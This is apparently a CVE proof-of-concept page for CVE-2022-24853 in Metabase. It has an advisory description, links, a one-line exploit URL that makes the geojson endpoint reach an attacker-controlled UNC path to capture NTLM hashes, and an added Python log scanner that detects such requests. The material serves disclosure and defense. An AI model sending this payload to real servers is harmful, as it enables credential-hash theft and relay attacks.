CVE-2022-24853 PoC — Metabase Information Disclosure Vulnerability

Source
Associated Vulnerability
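Title: Metabase Information Disclosure Vulnerability (CVE-2022-24853)
Description: Metabase is an open-source data analytics platform from Metabase, a US company. Metabase has an information disclosure vulnerability. It stems from a proxy that loads arbitrary URLs for JSON maps as part of our GeoJSON support. While we do validation to not return the contents of arbitrary URLs, in some circumstances a crafted request could cause file access on Windows, which makes an NTLM relay attack possible and could allow an attacker to receive password hashes. The following products and versions are affected: x.42 - x.42.3, x.41 - x.41.6, x.40 - x.40.7.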
Description
Metabase NTLM Attack 
Readme
# CVE-2022-24853
Metabase NTLM Reflection / Relay Attack [CVE-2022-24853](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24853)

Blog Post about the finding: https://secure77.de/metabase-ntlm-relay-attack/

Github Security Advisory: https://github.com/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m


## POC
```plain
http://metabase-target-server.com/api/geojson?url=jar:file:\<attacker-ip>\test.txt!/
```
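
The following detection sketch is an added example, not part of the original README or of Metabase: it scans web access-log lines for `/api/geojson` requests whose `url` parameter is not a plain HTTP(S) URL, which is the shape of the request above. The combined log format, the allowed-scheme list and the sample lines (documentation addresses 192.0.2.10 and 198.51.100.7) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_SCHEMES = {"http", "https"}  # assumption: remote maps are only fetched over HTTP(S)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def geojson_url_param(target):
    """Return the decoded `url` parameter of an /api/geojson request, else None."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/api/geojson":
        return None
    values = parse_qs(parts.query).get("url")  # parse_qs percent-decodes once
    return values[0] if values else None

def suspicious_reasons(value):
    """List the reasons a `url` value does not look like a plain HTTP(S) map URL."""
    reasons = []
    scheme = value.split(":", 1)[0].lower() if ":" in value else ""
    if scheme not in ALLOWED_SCHEMES:
        reasons.append("scheme=" + (scheme or "none"))
    if "\\" in value:  # backslashes point at a Windows/UNC-style path
        reasons.append("backslash")
    return reasons

def scan(lines):
    """Yield (line_number, url_value, reasons) for each suspicious log line."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        value = geojson_url_param(m.group(1)) if m else None
        if value is not None:
            reasons = suspicious_reasons(value)
            if reasons:
                yield n, value, reasons

# Constructed sample access-log lines; status codes and sizes are placeholders.
SAMPLE_LOG = [
    r'198.51.100.7 - - [01/Apr/2022:10:00:01 +0000] "GET /api/geojson?url=https://example.com/maps/world.json HTTP/1.1" 200 5120',
    r'198.51.100.7 - - [01/Apr/2022:10:00:05 +0000] "GET /api/geojson?url=jar:file:\192.0.2.10\test.txt!/ HTTP/1.1" 400 87',
    r'198.51.100.7 - - [01/Apr/2022:10:00:09 +0000] "GET /api/geojson?url=jar%3Afile%3A%5C192.0.2.10%5Ctest.txt%21%2F HTTP/1.1" 400 87',
    r'198.51.100.7 - - [01/Apr/2022:10:00:12 +0000] "GET /api/card/12 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {value!r} -> {', '.join(reasons)}")
```

The percent-encoded and raw forms of the request are both flagged because the check runs on the decoded parameter value rather than on the raw log text.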

